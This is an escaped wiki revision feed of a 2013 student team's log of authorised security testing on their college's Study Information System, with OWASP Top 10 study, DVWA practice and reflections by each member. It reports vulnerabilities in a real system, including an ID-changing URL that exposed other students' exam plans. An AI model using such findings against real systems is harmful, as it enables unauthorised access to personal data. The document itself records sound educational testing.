&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62373</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62373"/>
		<updated>2013-04-05T06:09:15Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
